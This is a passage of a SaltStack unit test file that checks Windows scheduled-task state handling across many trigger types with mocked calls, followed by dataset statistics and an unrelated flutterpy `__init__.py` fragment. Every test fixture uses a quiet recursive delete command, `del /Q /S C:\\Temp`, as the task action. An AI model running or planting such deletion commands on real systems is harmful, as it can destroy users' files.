'actions': [{'cmd': 'del /Q /S C:\\\\Temp',
'action_type': 'Execute'}],
'triggers': [{'delay': False,
'execution_time_limit': '3 days',
'trigger_type': 'OnSessionChange',
'start_date': '2019-05-14', 'enabled': True,
'start_time': '13:00:00'}],
'settings': {'delete_after': False,
'multiple_instances': 'No New Instance',
'execution_time_limit': '3 days',
'allow_demand_start': True,
'restart_interval': False,
'stop_if_on_batteries': True,
'force_stop': True,
'wake_to_run': False}}}
task_info = {'conditions': {'ac_only': True,
'run_if_idle': False,
'run_if_network': False,
'start_when_available': False},
'trigger': {'end_date': None,
'execution_time_limit': '3 days',
'state_change': 'SessionUnlock', 'random_delay': False,
'end_time': '00:00:00',
'start_date': '2019-05-14',
'repeat_duration': None,
'start_time': '01:00 pm',
'repeat_interval': None,
'delay': False,
'trigger_enabled': True,
'trigger_type': 'OnSessionChange',
'repeat_stop_at_duration_end': False},
'action': {'start_in': '',
'cmd': 'del /Q /S C:\\\\Temp',
'arguments': '',
'action_type': 'Execute'},
'settings': {'delete_after': False,
'multiple_instances': 'No New Instance',
'execution_time_limit': '3 days',
'allow_demand_start': True,
'restart_interval': False,
'stop_if_on_batteries': True,
'force_stop': True,
'wake_to_run': False}}
prediction = win_task._get_task_state_prediction(state, task_info)
self.assertEqual(state, prediction)
@skipIf(NO_MOCK, NO_MOCK_REASON)
@skipIf(not salt.utils.platform.is_windows(), "Windows is required")
class WinTaskTriggersCase(TestCase, LoaderModuleMockMixin):
'''
The test below just checks if the state perdition is correct.
A lot of test might look the same but under hud a lot of checks are happening.
Triggers Test does not test Once or Event
'''
def setup_loader_modules(self):
return {win_task: {}}
def test_Daily(self):
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'Daily',
'start_date': '2019-05-14',
'start_time': '01:00 pm',
'days_interval': 101}
info = {'triggers': [{'random_delay': False,
'trigger_type': 'Daily',
'execution_time_limit': '3 days',
'start_time': '13:00:00',
'enabled': True,
'start_date': '2019-05-14'}],
'actions': [{'cmd': 'del /Q /S C:\\\\Temp',
'action_type': 'Execute'}],
'conditions': {'start_when_available': False,
'run_if_network': False,
'ac_only': True,
'run_if_idle': False},
'settings': {'wake_to_run': False,
'allow_demand_start': True,
'multiple_instances': 'No New Instance',
'execution_time_limit': '3 days',
'force_stop': True,
'delete_after': False,
'stop_if_on_batteries': True,
'restart_interval': False}}
with patch.dict(win_task.__salt__, {'task.list_tasks': MagicMock(side_effect=[['salt']] * 2),
'task.info': MagicMock(side_effect=[info])}), \
patch.dict(win_task.__opts__, {"test": True}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
ret = win_task.present(name='salt', location='', force=True, **kwargs)
self.assertEqual(ret['result'], True)
def test_Weekly(self):
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'Weekly',
'start_date': '2019-05-14',
'start_time': '01:00 pm',
'days_of_week': ['Monday', 'Wednesday', 'Friday'],
'weeks_interval': 1}
info = {'triggers': [{'start_date': '2019-05-14',
'execution_time_limit': '3 days',
'random_delay': False,
'enabled': True,
'start_time': '13:00:00',
'trigger_type': 'Weekly'}],
'actions': [{'cmd': 'del /Q /S C:\\\\Temp',
'action_type': 'Execute'}],
'conditions': {'start_when_available': False,
'run_if_idle': False,
'run_if_network': False,
'ac_only': True},
'settings': {'allow_demand_start': True,
'wake_to_run': False,
'execution_time_limit': '3 days',
'force_stop': True,
'multiple_instances': 'No New Instance',
'stop_if_on_batteries': True,
'restart_interval': False,
'delete_after': False}}
with patch.dict(win_task.__salt__, {'task.list_tasks': MagicMock(side_effect=[['salt']] * 2),
'task.info': MagicMock(side_effect=[info])}), \
patch.dict(win_task.__opts__, {"test": True}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
ret = win_task.present(name='salt', location='', force=True, **kwargs)
self.assertEqual(ret['result'], True)
def test_Monthly(self):
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'Monthly',
'start_date': '2019-05-14',
'start_time': '01:00 pm',
'months_of_year': ['January', 'July'],
'days_of_month': [6, 16, 26],
'last_day_of_month': True}
info = {'triggers': [{'start_date': '2019-05-14',
'random_delay': False,
'trigger_type': 'Monthly',
'execution_time_limit': '3 days',
'start_time': '13:00:00',
'enabled': True}],
'actions': [{'cmd': 'del /Q /S C:\\\\Temp',
'action_type': 'Execute'}],
'conditions': {'run_if_idle': False,
'run_if_network': False,
'start_when_available': False,
'ac_only': True},
'settings': {'force_stop': True,
'allow_demand_start': True,
'delete_after': False,
'multiple_instances': 'No New Instance',
'execution_time_limit': '3 days', 'stop_if_on_batteries': True,
'restart_interval': False,
'wake_to_run': False}}
with patch.dict(win_task.__salt__, {'task.list_tasks': MagicMock(side_effect=[['salt']] * 2),
'task.info': MagicMock(side_effect=[info])}), \
patch.dict(win_task.__opts__, {"test": True}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
ret = win_task.present(name='salt', location='', force=True, **kwargs)
self.assertEqual(ret['result'], True)
def test_MonthlyDay(self):
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'MonthlyDay',
'start_date': '2019-05-14',
'start_time': '01:00 pm',
'months_of_year': ['January', 'July'],
'weeks_of_month': ['First', 'Third'],
'last_week_of_month': True,
'days_of_week': ['Monday', 'Wednesday', 'Friday']}
info = {'triggers': [{'start_date': '2019-05-14',
'random_delay': False,
'trigger_type': 'MonthlyDay',
'execution_time_limit': '3 days',
'start_time': '13:00:00',
'enabled': True}],
'actions': [{'cmd': 'del /Q /S C:\\\\Temp',
'action_type': 'Execute'}],
'conditions': {'run_if_idle': False,
'run_if_network': False,
'start_when_available': False,
'ac_only': True},
'settings': {'force_stop': True,
'allow_demand_start': True,
'delete_after': False,
'multiple_instances': 'No New Instance',
'execution_time_limit': '3 days', 'stop_if_on_batteries': True,
'restart_interval': False,
'wake_to_run': False}}
with patch.dict(win_task.__salt__, {'task.list_tasks': MagicMock(side_effect=[['salt']] * 2),
'task.info': MagicMock(side_effect=[info])}), \
patch.dict(win_task.__opts__, {"test": True}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
ret = win_task.present(name='salt', location='', force=True, **kwargs)
self.assertEqual(ret['result'], True)
def test_OnIdle(self):
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'OnIdle',
'start_date': '2019-05-14',
'start_time': '01:00 pm'}
info = {'triggers': [{'start_date': '2019-05-14',
'random_delay': False,
'trigger_type': 'OnIdle',
'execution_time_limit': '3 days',
'start_time': '13:00:00',
'enabled': True}],
'actions': [{'cmd': 'del /Q /S C:\\\\Temp',
'action_type': 'Execute'}],
'conditions': {'run_if_idle': False,
'run_if_network': False,
'start_when_available': False,
'ac_only': True},
'settings': {'force_stop': True,
'allow_demand_start': True,
'delete_after': False,
'multiple_instances': 'No New Instance',
'execution_time_limit': '3 days',
'stop_if_on_batteries': True,
'restart_interval': False,
'wake_to_run': False}}
with patch.dict(win_task.__salt__, {'task.list_tasks': MagicMock(side_effect=[['salt']] * 2),
'task.info': MagicMock(side_effect=[info])}), \
patch.dict(win_task.__opts__, {"test": True}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
ret = win_task.present(name='salt', location='', force=True, **kwargs)
self.assertEqual(ret['result'], True)
def test_OnTaskCreation(self):
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'OnTaskCreation',
'start_date': '2019-05-14',
'start_time': '01:00 pm'}
info = {'triggers': [{'start_date': '2019-05-14',
'random_delay': False,
'trigger_type': 'OnTaskCreation',
'execution_time_limit': '3 days',
'start_time': '13:00:00',
'enabled': True}],
'actions': [{'cmd': 'del /Q /S C:\\\\Temp',
'action_type': 'Execute'}],
'conditions': {'run_if_idle': False,
'run_if_network': False,
'start_when_available': False,
'ac_only': True},
'settings': {'force_stop': True,
'allow_demand_start': True,
'delete_after': False,
'multiple_instances': 'No New Instance',
'execution_time_limit': '3 days',
'stop_if_on_batteries': True,
'restart_interval': False,
'wake_to_run': False}}
with patch.dict(win_task.__salt__, {'task.list_tasks': MagicMock(side_effect=[['salt']] * 2),
'task.info': MagicMock(side_effect=[info])}), \
patch.dict(win_task.__opts__, {"test": True}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
ret = win_task.present(name='salt', location='', force=True, **kwargs)
self.assertEqual(ret['result'], True)
def test_OnBoot(self):
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'OnBoot',
'start_date': '2019-05-14',
'start_time': '01:00 pm'}
info = {'triggers': [{'start_date': '2019-05-14',
'random_delay': False,
'trigger_type': 'OnBoot',
'execution_time_limit': '3 days',
'start_time': '13:00:00',
'enabled': True,
'delay': False}],
'actions': [{'cmd': 'del /Q /S C:\\\\Temp',
'action_type': 'Execute'}],
'conditions': {'run_if_idle': False,
'run_if_network': False,
'start_when_available': False,
'ac_only': True},
'settings': {'force_stop': True,
'allow_demand_start': True,
'delete_after': False,
'multiple_instances': 'No New Instance',
'execution_time_limit': '3 days',
'stop_if_on_batteries': True,
'restart_interval': False,
'wake_to_run': False}}
with patch.dict(win_task.__salt__, {'task.list_tasks': MagicMock(side_effect=[['salt']] * 2),
'task.info': MagicMock(side_effect=[info])}), \
patch.dict(win_task.__opts__, {"test": True}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
ret = win_task.present(name='salt', location='', force=True, **kwargs)
self.assertEqual(ret['result'], True)
def test_OnLogon(self):
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'OnLogon',
'start_date': '2019-05-14',
'start_time': '01:00 pm'}
info = {'triggers': [{'start_date': '2019-05-14',
'random_delay': False,
'trigger_type': 'OnLogon',
'execution_time_limit': '3 days',
'start_time': '13:00:00',
'enabled': True}],
'actions': [{'cmd': 'del /Q /S C:\\\\Temp',
'action_type': 'Execute'}],
'conditions': {'run_if_idle': False,
'run_if_network': False,
'start_when_available': False,
'ac_only': True},
'settings': {'force_stop': True,
'allow_demand_start': True,
'delete_after': False,
'multiple_instances': 'No New Instance',
'execution_time_limit': '3 days',
'stop_if_on_batteries': True,
'restart_interval': False,
'wake_to_run': False}}
with patch.dict(win_task.__salt__, {'task.list_tasks': MagicMock(side_effect=[['salt']] * 2),
'task.info': MagicMock(side_effect=[info])}), \
patch.dict(win_task.__opts__, {"test": True}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
ret = win_task.present(name='salt', location='', force=True, **kwargs)
self.assertEqual(ret['result'], True)
def test_OnSessionChange(self):
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'OnSessionChange',
'start_date': '2019-05-14',
'start_time': '01:00 pm',
'state_change': 'SessionUnlock'}
info = {'actions': [{'cmd': 'del /Q /S C:\\\\Temp',
'action_type': 'Execute'}],
'settings': {'delete_after': False,
'execution_time_limit': '3 days',
'wake_to_run': False,
'force_stop': True,
'multiple_instances': 'No New Instance',
'stop_if_on_batteries': True,
'restart_interval': False,
'allow_demand_start': True},
'triggers': [{'trigger_type': 'OnSessionChange',
'execution_time_limit': '3 days',
'delay': False,
'enabled': True,
'start_date': '2019-05-14',
'start_time': '13:00:00'}],
'conditions': {'run_if_idle': False,
'ac_only': True,
'run_if_network': False,
'start_when_available': False}}
with patch.dict(win_task.__salt__, {'task.list_tasks': MagicMock(side_effect=[['salt']] * 2),
'task.info': MagicMock(side_effect=[info])}), \
patch.dict(win_task.__opts__, {"test": True}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
ret = win_task.present(name='salt', location='', force=True, **kwargs)
self.assertEqual(ret['result'], True)
| 50.275591 | 110 | 0.434064 | 2,267 | 25,540 | 4.583591 | 0.09528 | 0.048504 | 0.042729 | 0.056972 | 0.827928 | 0.800885 | 0.783659 | 0.757194 | 0.735733 | 0.735733 | 0 | 0.025347 | 0.433085 | 25,540 | 507 | 111 | 50.374753 | 0.692313 | 0.014213 | 0 | 0.817352 | 0 | 0 | 0.257291 | 0.001074 | 0 | 0 | 0 | 0 | 0.031963 | 1 | 0.03653 | false | 0.004566 | 0.018265 | 0.006849 | 0.068493 | 0.002283 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a013d9fe2c26067a978f834f6b4738e5e7d0639b | 169 | py | Python | flutterpy/derivatives/__init__.py | mtnzguillermo/windflupy | fb25c349d5fb392a69a3e8b3fb29073bc8f62640 | [
"BSD-3-Clause"
] | 1 | 2021-03-05T10:58:00.000Z | 2021-03-05T10:58:00.000Z | flutterpy/derivatives/__init__.py | mtnzguillermo/windflupy | fb25c349d5fb392a69a3e8b3fb29073bc8f62640 | [
"BSD-3-Clause"
] | null | null | null | flutterpy/derivatives/__init__.py | mtnzguillermo/windflupy | fb25c349d5fb392a69a3e8b3fb29073bc8f62640 | [
"BSD-3-Clause"
] | null | null | null |
from flutterpy.derivatives.flutter_derivatives import *
from flutterpy.derivatives.independent_functions import *
from flutterpy.derivatives.notations.notation import * | 42.25 | 57 | 0.869822 | 18 | 169 | 8.055556 | 0.5 | 0.268966 | 0.496552 | 0.413793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071006 | 169 | 4 | 58 | 42.25 | 0.923567 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.